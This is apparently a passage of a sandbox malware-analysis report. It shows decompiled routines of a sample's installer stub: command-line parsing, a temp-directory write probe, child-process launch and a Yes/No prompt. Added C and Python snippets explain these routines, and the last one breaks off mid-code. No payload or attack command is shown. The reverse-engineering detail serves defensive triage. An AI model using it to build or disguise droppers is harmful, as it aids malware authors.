                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                    							__eflags = _t41 - 0x22;
                                                                                                                                                                                                    							if(_t41 == 0x22) {
                                                                                                                                                                                                    								__eflags = _t54;
                                                                                                                                                                                                    								_t15 = _t54 == 0;
                                                                                                                                                                                                    								__eflags = _t15;
                                                                                                                                                                                                    								_t54 = 0 | _t15;
                                                                                                                                                                                                    								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                    							__imp___ismbblead(_t26);
                                                                                                                                                                                                    							__eflags = _t26;
                                                                                                                                                                                                    							if(_t26 != 0) {
                                                                                                                                                                                                    								_t59 = _t59 + 1;
                                                                                                                                                                                                    								__eflags = _t59;
                                                                                                                                                                                                    								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t59 = _t59 + 1;
                                                                                                                                                                                                    							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L40:
                                                                                                                                                                                                    					return E0039724D(_t30);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t58 = 1;
                                                                                                                                                                                                    				__eflags = 1;
                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                    			}
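The loop the decompiler renders between the `_acmdln` load and the `E00392BFB` call is the CRT's program-name skip, and the quoting and multibyte rules it applies are easy to misread in the register-level output. The C below is an added illustration written for this page, not code from the Joe Sandbox report or from the sample: it re-implements that loop portably so the rules can be exercised on realistic command lines, together with the nShowCmd selection that precedes the call. Assumptions: treating `E00392BFB` as WinMain and the surrounding code as the MSVC CRT start-up template is an inference from the pattern; `sjis_lead` is a constructed stand-in for `_ismbblead()` under a Shift-JIS code page; the command-line strings are constructed.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Added illustration, not code from the report or from the sample.
 * Re-implements the program-name skip the decompiled start-up code performs on
 * _acmdln, with the rules read straight off the decompiled loop:
 *   - a '"' toggles the "inside double quotes" flag (_t54 / *(ebp-0x20));
 *   - outside quotes the first byte <= 0x20 ends the program name, after which
 *     the run of bytes in 1..0x20 is skipped (the inner while loop);
 *   - a multibyte lead byte is stepped over together with its trail byte, so a
 *     0x22 trail byte is never taken as a quote (the _ismbblead call at L32).
 * Assumption: is_lead stands in for _ismbblead(); NULL means a single-byte code page. */
typedef int (*lead_byte_fn)(unsigned char c);

const char *skip_program_name(const char *cmdline, lead_byte_fn is_lead)
{
    const unsigned char *p = (const unsigned char *)cmdline;
    int in_quotes = 0;

    /* Pass 1: step over the program name (the L32 path in the decompilation). */
    while (*p > 0x20 || (*p != 0 && in_quotes)) {
        if (*p == '"')
            in_quotes = !in_quotes;
        /* The CRT does not check that a trail byte exists; the p[1] test is an
         * added guard so a string that ends in a lead byte cannot be overrun. */
        if (is_lead != NULL && is_lead(*p) && p[1] != 0)
            p++;
        p++;
    }
    /* Pass 2: skip the separator run (the inner while loop in the decompilation). */
    while (*p != 0 && *p <= 0x20)
        p++;
    return (const char *)p;
}

/* Constructed stand-in for _ismbblead() under a Shift-JIS code page (lead bytes
 * 0x81-0x9F and 0xE0-0xFC); the real function consults the current MBCS locale. */
int sjis_lead(unsigned char c)
{
    return (c >= 0x81 && c <= 0x9F) || (c >= 0xE0 && c <= 0xFC);
}

/* Mirrors the nShowCmd selection that precedes the WinMain call:
 * STARTUPINFO.dwFlags & STARTF_USESHOWWINDOW (the *(ebp-0x3c) & 1 test) selects
 * wShowWindow (*(ebp-0x38) & 0xffff), otherwise SW_SHOWDEFAULT (0xa). */
#define STARTF_USESHOWWINDOW_FLAG 0x00000001u
#define SW_SHOWDEFAULT_VALUE      10u

unsigned choose_show_cmd(unsigned dwFlags, unsigned short wShowWindow)
{
    return (dwFlags & STARTF_USESHOWWINDOW_FLAG) ? wShowWindow : SW_SHOWDEFAULT_VALUE;
}

int main(void)
{
    /* Constructed sample command lines. */
    const char *samples[] = {
        "\"C:\\Program Files\\file.exe\" --silent x",
        "file.exe   -a  -b",
        "file.exe",
    };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("[%s] -> [%s]\n", samples[i], skip_program_name(samples[i], NULL));
    printf("nShowCmd without STARTF_USESHOWWINDOW: %u\n", choose_show_cmd(0, 3));
    return 0;
}
```

For triage the useful consequence is that nothing before the marked `E00392BFB(...)` call is specific to this sample: the unpacking and credential-harvesting behaviour the report lists has to sit beyond it, so the entry point is a poor anchor for a detection rule but a reliable breakpoint for reaching the sample's own code under a debugger. The Shift-JIS case also shows why the lead-byte step matters: without it, a lead byte followed by 0x22 opens a quote that never closes and the entire command line is consumed as the program name.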

                                                                                                                                                                                                    0x00396a60
                                                                                                                                                                                                    0x00396a6a
                                                                                                                                                                                                    0x00396a6c
                                                                                                                                                                                                    0x00396a71
                                                                                                                                                                                                    0x00396a78
                                                                                                                                                                                                    0x00396a7f
                                                                                                                                                                                                    0x00396a85
                                                                                                                                                                                                    0x00396a8e
                                                                                                                                                                                                    0x00396a91
                                                                                                                                                                                                    0x00396a93
                                                                                                                                                                                                    0x00396a9c
                                                                                                                                                                                                    0x00396aa2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396aa6
                                                                                                                                                                                                    0x00396ab4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396aa8
                                                                                                                                                                                                    0x00396aaa
                                                                                                                                                                                                    0x00396aab
                                                                                                                                                                                                    0x00396aab
                                                                                                                                                                                                    0x00396abf
                                                                                                                                                                                                    0x00396abf
                                                                                                                                                                                                    0x00396ac5
                                                                                                                                                                                                    0x00396ad1
                                                                                                                                                                                                    0x00396ad7
                                                                                                                                                                                                    0x00396b05
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396ad9
                                                                                                                                                                                                    0x00396ad9
                                                                                                                                                                                                    0x00396ae9
                                                                                                                                                                                                    0x00396af0
                                                                                                                                                                                                    0x00396af2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396af4
                                                                                                                                                                                                    0x00396af4
                                                                                                                                                                                                    0x00396afb
                                                                                                                                                                                                    0x00396afb
                                                                                                                                                                                                    0x00396af2
                                                                                                                                                                                                    0x00396ac7
                                                                                                                                                                                                    0x00396ac7
                                                                                                                                                                                                    0x00396ac9
                                                                                                                                                                                                    0x00396b0b
                                                                                                                                                                                                    0x00396b0b
                                                                                                                                                                                                    0x00396b11
                                                                                                                                                                                                    0x00396b13
                                                                                                                                                                                                    0x00396b18
                                                                                                                                                                                                    0x00396b1d
                                                                                                                                                                                                    0x00396b24
                                                                                                                                                                                                    0x00396b24
                                                                                                                                                                                                    0x00396b30
                                                                                                                                                                                                    0x00396b39
                                                                                                                                                                                                    0x00396b39
                                                                                                                                                                                                    0x00396b3b
                                                                                                                                                                                                    0x00396b42
                                                                                                                                                                                                    0x00396b57
                                                                                                                                                                                                    0x00396b5f
                                                                                                                                                                                                    0x00396b65
                                                                                                                                                                                                    0x00396b65
                                                                                                                                                                                                    0x00396b67
                                                                                                                                                                                                    0x00396b6c

APIs
  • Part of subcall function 00397155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00397182
  • Part of subcall function 00397155: GetCurrentProcessId.KERNEL32 ref: 00397191
  • Part of subcall function 00397155: GetCurrentThreadId.KERNEL32 ref: 0039719A
  • Part of subcall function 00397155: GetTickCount.KERNEL32 ref: 003971A3
  • Part of subcall function 00397155: QueryPerformanceCounter.KERNEL32(?), ref: 003971B8
• GetStartupInfoW.KERNEL32(?,003972B8,00000058), ref: 00396A7F
• Sleep.KERNEL32(000003E8), ref: 00396AB4
• _amsg_exit.MSVCRT ref: 00396AC9
• _initterm.MSVCRT ref: 00396B1D
• __IsNonwritableInCurrentImage.LIBCMT ref: 00396B49
• exit.KERNELBASE ref: 00396BBF
• _ismbblead.MSVCRT ref: 00396BDA
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
• String ID:
• API String ID: 836923961-0
• Opcode ID: e65c90278889d0412e58e0b7d84861e07c0ee47a8a556e74717f599a54721fa2
• Instruction ID: bc0e2a70351e400f3dfaffad00ffbc016313bc007f6e5860e26b0adf5b8d306b
• Opcode Fuzzy Hash: e65c90278889d0412e58e0b7d84861e07c0ee47a8a556e74717f599a54721fa2
• Instruction Fuzzy Hash: E141027195A7268BDF23AB6ADC067AA77E8EB85720F11011BE841E7290DB754C408B90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 631 3958c8-3958d5 632 3958d8-3958dd 631->632 632->632 633 3958df-3958f1 LocalAlloc 632->633 634 395919-395959 call 391680 call 39658a CreateFileA LocalFree 633->634 635 3958f3-395901 call 3944b9 633->635 639 395906-395910 call 396285 634->639 645 39595b-39596c CloseHandle GetFileAttributesA 634->645 635->639 644 395912-395918 639->644 645->639 646 39596e-395970 645->646 646->639 647 395972-39597b 646->647 647->644
C-Code - Quality: 95%
/* Decompiled routine (Joe Sandbox IDA plugin output). It takes a directory path in ECX,
   tries to create a throw-away file "TMP4351$.TMP" inside it, and returns 1 if that
   succeeds and the path really is a directory; otherwise it stores an error code at
   0x399124 and returns 0. In effect this is a "is this directory writable?" probe. */
E003958C8(intOrPtr* __ecx) {
    void* _v8;
    intOrPtr _t6;
    void* _t10;
    void* _t12;
    void* _t14;
    signed char _t16;
    void* _t20;
    void* _t23;
    intOrPtr* _t27;
    CHAR* _t33;
    signed int _t36;

    _push(__ecx);
    _t33 = __ecx;
    _t27 = __ecx;
    _t23 = __ecx + 1;
    /* inline strlen(): advance until the terminating NUL byte */
    do {
        _t6 =  *_t27;
        _t27 = _t27 + 1;
    } while (_t6 != 0);
    _t36 = _t27 - _t23 + 0x14;
    /* LocalAlloc(LPTR = 0x40, ...): zero-initialised buffer for path + "\TMP4351$.TMP" */
    _t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
    if(_t20 != 0) {
        E00391680(_t20, _t36, _t33);             /* appears to copy the directory path into the buffer */
        E0039658A(_t20, _t36, "TMP4351$.TMP");  /* appears to append the temporary file name */
        /* GENERIC_WRITE (0x40000000), no sharing, CREATE_NEW (1),
           FILE_ATTRIBUTE_NORMAL | FILE_FLAG_DELETE_ON_CLOSE (0x4000080):
           the file disappears as soon as the handle is closed below */
        _t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
        _v8 = _t10;
        LocalFree(_t20);
        _t12 = _v8;
        if(_t12 == 0xffffffff) {                /* INVALID_HANDLE_VALUE: directory not writable */
            goto L4;
        } else {
            CloseHandle(_t12);
            _t16 = GetFileAttributesA(_t33); // executed
            /* 0x10 = FILE_ATTRIBUTE_DIRECTORY: confirm the path is a directory */
            if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                goto L4;
            } else {
                 *0x399124 = 0;
                _t14 = 1;
            }
        }
    } else {
        E003944B9(0, 0x4b5, 0, 0, 0x10, 0);    /* allocation failed: report with resource/message id 0x4b5 */
        L4:
         *0x399124 = E00396285();             /* store an error code (helper not resolved in this report) */
        _t14 = 0;
    }
    return _t14;
}













Per-line instruction addresses for the listing above (the address column was not preserved by the extraction): 0x003958cd to 0x0039597a

APIs
• LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00395534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003958E7
• CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00395534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00395943
• LocalFree.KERNEL32(00000000,?,00395534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0039594D
• CloseHandle.KERNEL32(00000000,?,00395534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0039595C
• GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00395534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00395963
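As an added example (not code from the report, from Joe Sandbox, or from the sample), the following parser reads the "APIs" bullet lines above and decodes the CreateFileA arguments of the call at 0x395943 against the Win32 constants: dwDesiredAccess 0x40000000 is GENERIC_WRITE, dwCreationDisposition 1 is CREATE_NEW, and dwFlagsAndAttributes 0x04000080 is FILE_FLAG_DELETE_ON_CLOSE | FILE_ATTRIBUTE_NORMAL. That combination, followed by CloseHandle and GetFileAttributesA on the IXP001.TMP directory, is a writability probe: the file exists only while the handle is open and is removed when it is closed. The example assumes, from the report's layout, that the first printed stack slots are the API's parameters in declaration order (seven for CreateFileA) and that the remaining slots are other stack contents; the name TMP4351$.TMP appears among those slots and in the String ID.

```python
"""Parse Joe Sandbox 'APIs' bullets and decode the CreateFileA call's arguments."""
import re
from typing import Dict, List, NamedTuple

# Constructed input: the five bullet lines of the APIs list above, copied verbatim.
API_LINES = r"""
• LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00395534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003958E7
• CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00395534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00395943
• LocalFree.KERNEL32(00000000,?,00395534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0039594D
• CloseHandle.KERNEL32(00000000,?,00395534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0039595C
• GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00395534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00395963
"""


class ApiCall(NamedTuple):
    name: str        # e.g. "CreateFileA"
    module: str      # DLL that exported it, e.g. "KERNELBASE"
    args: List[str]  # printed stack slots as-is: hex words, resolved strings, or "?"
    ref: int         # address of the call site ("ref:")


# "<bullet> Name.MODULE(slot,slot,...), ref: HEXADDR"
API_RE = re.compile(
    r"^•\s*(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_line(line: str) -> ApiCall:
    m = API_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    return ApiCall(m["name"], m["module"], m["args"].split(","), int(m["ref"], 16))


def parse_api_lines(text: str) -> List[ApiCall]:
    return [parse_api_line(line) for line in text.splitlines() if line.strip()]


# Win32 constants (winnt.h / fileapi.h). Assumption of this example: the first
# printed slots are the parameters in order, so for CreateFileA slot 1 is
# dwDesiredAccess, 2 dwShareMode, 4 dwCreationDisposition, 5 dwFlagsAndAttributes.
ACCESS_BITS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
               0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_BITS = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAG_BITS = {0x1: "FILE_ATTRIBUTE_READONLY", 0x2: "FILE_ATTRIBUTE_HIDDEN",
             0x4: "FILE_ATTRIBUTE_SYSTEM", 0x80: "FILE_ATTRIBUTE_NORMAL",
             0x100: "FILE_ATTRIBUTE_TEMPORARY", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
             0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN",
             0x10000000: "FILE_FLAG_RANDOM_ACCESS", 0x20000000: "FILE_FLAG_NO_BUFFERING",
             0x40000000: "FILE_FLAG_OVERLAPPED", 0x80000000: "FILE_FLAG_WRITE_THROUGH"}
GENERIC_WRITE, CREATE_NEW, FILE_FLAG_DELETE_ON_CLOSE = 0x40000000, 1, 0x04000000


def decode_bits(value: int, table: Dict[int, str]) -> List[str]:
    """Symbolic names for the set bits, lowest bit first; unknown bits stay hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    unknown = value & ~sum(table)
    if unknown:
        names.append(f"0x{unknown:08x}")
    return names


def decode_create_file(call: ApiCall) -> Dict[str, object]:
    if call.name not in ("CreateFileA", "CreateFileW"):
        raise ValueError(f"{call.name} is not CreateFile")
    access, share, _sec_attr, disp, flags = (int(a, 16) for a in call.args[1:6])
    return {"access": decode_bits(access, ACCESS_BITS),
            "share": decode_bits(share, SHARE_BITS),
            "disposition": DISPOSITIONS.get(disp, f"0x{disp:x}"),
            "flags": decode_bits(flags, FLAG_BITS)}


def is_write_probe(call: ApiCall) -> bool:
    """A CreateFile that only tests whether a directory is writable: write access,
    the file must not already exist, and it is deleted again on CloseHandle."""
    if call.name not in ("CreateFileA", "CreateFileW"):
        return False
    access, disp, flags = (int(call.args[i], 16) for i in (1, 4, 5))
    return bool(access & GENERIC_WRITE) and disp == CREATE_NEW and bool(flags & FILE_FLAG_DELETE_ON_CLOSE)


def find_write_probes(calls: List[ApiCall]) -> List[ApiCall]:
    return [c for c in calls if is_write_probe(c)]


if __name__ == "__main__":
    calls = parse_api_lines(API_LINES)
    for c in calls:
        print(f"{c.ref:08x} {c.module}!{c.name} ({len(c.args)} printed slots)")
    for c in find_write_probes(calls):
        print("write probe at", hex(c.ref), decode_create_file(c))
```

The same decoder applies to any CreateFile bullet in the report; a call decoding to GENERIC_WRITE, CREATE_NEW and FILE_FLAG_DELETE_ON_CLOSE with no following WriteFile is a directory-writability check rather than a file drop, which matters when triaging which CreateFile calls in a listing actually leave something on disk.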
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
• String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
• API String ID: 747627703-2825630923
• Opcode ID: c18fffc2e9e4cc21f08bec3128abd313abe5e11b78433be6aa429a87c3c83ead
• Instruction ID: e2c19b97563b8eb955e61997e5a79f4494a039e7689d5155549848418a5fd352
• Opcode Fuzzy Hash: c18fffc2e9e4cc21f08bec3128abd313abe5e11b78433be6aa429a87c3c83ead
• Instruction Fuzzy Hash: E911263260161167DB221F7A6C4DB9B7E9DEF46360F100616F505D7291CB71884683A0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (basic blocks as "id address-range [calls] -> successor ids", rebuilt from the graph's edge list)
• 675 393fef-394010 -> 676, 677
• 676 39410a-39411a call 396ce0
• 677 394016-39403b CreateProcessA -> 678, 679
• 678 394041-39406e WaitForSingleObject GetExitCodeProcess -> 682, 683
• 679 3940c4-394101 call 396285 GetLastError FormatMessageA call 3944b9 -> 694
• 682 394091 call 39411b -> 689
• 683 394070-394077 -> 682, 687
• 687 394079-39407b -> 682, 688
• 688 39407d-394089 -> 682, 691
• 689 394096-3940b8 CloseHandle * 2 -> 692, 693
• 691 39408b -> 682
• 692 394108 -> 676
• 693 3940ba-3940c0 -> 692, 695
• 694 394106 -> 692
• 695 3940c2 -> 694
C-Code - Quality: 84%
E00393FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
	signed int _v8;
	char _v524;
	long _v528;
	struct _PROCESS_INFORMATION _v544;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t20;
	void* _t22;
	int _t25;
	signed int _t34; // used below; declaration omitted by the decompiler
	intOrPtr* _t39;
	signed int _t44;
	void* _t49;
	signed int _t50;
	intOrPtr _t53;

	_t45 = __edx;
	_t20 =  *0x398004; // 0x74c05eb4, the MSVC /GS security cookie
	_v8 = _t20 ^ _t50; // cookie ^ ebp in the stack-cookie slot, verified by E00396CE0 on every return path
	_t39 = __ecx;
	_t49 = 1;
	_t22 = 0;
	if(__ecx == 0) {
		L13:
		return E00396CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
	}
	asm("stosd"); // four stosd: zero the 16-byte PROCESS_INFORMATION in _v544
	asm("stosd");
	asm("stosd");
	asm("stosd");
	_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed; lpCommandLine = __ecx, bInheritHandles = FALSE, 0x20 = NORMAL_PRIORITY_CLASS
	if(_t25 == 0) {
		 *0x399124 = E00396285();
		FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed; 0x1000 = FORMAT_MESSAGE_FROM_SYSTEM into a 0x200-byte buffer
		_t45 = 0x4c4;
		E003944B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
		L11:
		_t49 = 0;
		L12:
		_t22 = _t49;
		goto L13;
	}
	WaitForSingleObject(_v544.hProcess, 0xffffffff); // INFINITE: block until the child exits
	_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
	_t44 = _v528; // child exit code; _v528 is a long, so the comparison below is signed
	_t53 =  *0x398a28; // 0x0
	if(_t53 == 0) {
		_t34 =  *0x399a2c; // 0x0
		if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
			_t34 = _t44 & 0xff000000;
			if((_t44 & 0xff000000) == 0xaa000000) { // only exit codes whose high byte is 0xAA are recorded
				 *0x399a2c = _t44;
			}
		}
	}
	E0039411B(_t34, _t44);
	CloseHandle(_v544.hThread);
	CloseHandle(_v544); // first member of the struct, i.e. _v544.hProcess
	if(( *0x399a34 & 0x00000400) == 0 || _v528 >= 0) { // with bit 0x400 set, an exit code with the top bit set (>= 0x80000000) counts as failure
		goto L12;
	} else {
		goto L11;
	}
}
Address column (one entry per line of the decompiled function above, as emitted by the report; 0x00000000 where no address is mapped): 0x00393fef, 0x00393ffa, 0x00394001, 0x00394008, 0x0039400a, 0x0039400b, 0x00394010, 0x0039410a, 0x0039411a, 0x0039411a, 0x0039401c, 0x0039401d, 0x0039401e, 0x0039401f, 0x00394033, 0x0039403b, 0x003940ca, 0x003940e9, 0x003940f8, 0x00394101, 0x00394106, 0x00394106, 0x00394108, 0x00394108, 0x00000000, 0x00394108, 0x00394049, 0x0039405c, 0x00394062, 0x00394068, 0x0039406e, 0x00394070, 0x00394077, 0x0039407f, 0x00394089, 0x0039408b, 0x0039408b, 0x00394089, 0x00394077, 0x00394091, 0x0039409c, 0x003940a8, 0x003940b8, 0x00000000, 0x003940c2, 0x00000000, 0x003940c2

APIs
• CreateProcessA.KERNELBASE ref: 00394033
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00394049
• GetExitCodeProcess.KERNELBASE ref: 0039405C
• CloseHandle.KERNEL32(?), ref: 0039409C
• CloseHandle.KERNEL32(?), ref: 003940A8
• GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 003940DC
• FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 003940E9
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
• String ID:
• API String ID: 3183975587-0
• Opcode ID: 3c825322e37b862eb1c40c81a546903ff2cddfba6a4c7da0cbd673c2b3173be9
• Instruction ID: 53db4c84678345c246eeb8c3cfc477d471d513aabc49e82a9bd77044d1a1a094
• Opcode Fuzzy Hash: 3c825322e37b862eb1c40c81a546903ff2cddfba6a4c7da0cbd673c2b3173be9
• Instruction Fuzzy Hash: 5E31D431641208ABEF229F65DC49FABB77CEB94700F1002ABF505D6260CA328C82CF51
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E003951E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				// First call with a NULL buffer returns the size of the "UPROMPT" resource; +1 leaves room for a terminator.
				_t1 = E0039468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1); // 0x40 = LPTR: fixed, zero-initialised
				if(_t28 != 0) {
					// Second call copies the resource into the buffer (_t29 is the size argument the decompiler did not track).
					if(E0039468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							// Prompt text is not "<None>": show it as a Yes/No question (0x20 = MB_ICONQUESTION, 4 = MB_YESNO; string ID 0x3e9).
							_t6 = E003944B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								// Anything but IDYES (6): record HRESULT_FROM_WIN32(ERROR_CANCELLED) and report failure.
								 *0x399124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x399124 = 0;
							L6:
							return 1;
						}
						// "<None>": no prompt is shown, execution continues silently.
						LocalFree(_t28);
						goto L6;
					}
					// Resource could not be read: error box (0x10 = MB_ICONERROR, string ID 0x4b1), HRESULT_FROM_WIN32(ERROR_RESOURCE_DATA_NOT_FOUND).
					E003944B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x399124 = 0x80070714;
					goto L10;
				}
				// Allocation failed: error box (string ID 0x4b5) and store the Win32 error (E00396285 wraps GetLastError).
				E003944B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x399124 = E00396285();
				goto L10;
			}
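The function above reads an RCDATA resource named UPROMPT out of the sample's own image, treats the literal string "<None>" as "no prompt", and otherwise puts the text into a Yes/No message box, continuing only on IDYES (6). When triaging a stub like this, the first thing an analyst wants is that prompt text and whether the stub would run without asking. The following Python is an added example, not code from the sample or from the Joe Sandbox report: it walks a PE resource directory with the standard library only, returns the TITLE and UPROMPT strings, and mirrors the decision of E003951E5. The PE it parses is constructed inline (a minimal PE32 with a single .rsrc section) so the script runs offline; `build_test_pe`, `pe_resources` and `sfx_prompt` are my names, not the sample's.

```python
import struct

RT_RCDATA = 10  # the sample looks its resources up by type 0x0A (FindResourceA(..., "TITLE", 0x0A))


def _rva_to_offset(sections, rva):
    """Map an RVA to a file offset using the section table."""
    for va, vsize, raw_off, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_off
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def _entry_name(data, res_off, name_field):
    """An entry carries a numeric ID or, with the high bit set, an offset to a length-prefixed UTF-16 name."""
    if name_field & 0x80000000:
        p = res_off + (name_field & 0x7FFFFFFF)
        n = struct.unpack_from("<H", data, p)[0]
        return data[p + 2 : p + 2 + 2 * n].decode("utf-16-le")
    return name_field


def _walk(data, res_off, dir_off, sections, path, out):
    """Recurse through the type / name / language levels of the resource directory tree."""
    named, ids = struct.unpack_from("<HH", data, dir_off + 12)
    for i in range(named + ids):
        name_field, off = struct.unpack_from("<II", data, dir_off + 16 + 8 * i)
        key = path + (_entry_name(data, res_off, name_field),)
        if off & 0x80000000:                      # subdirectory
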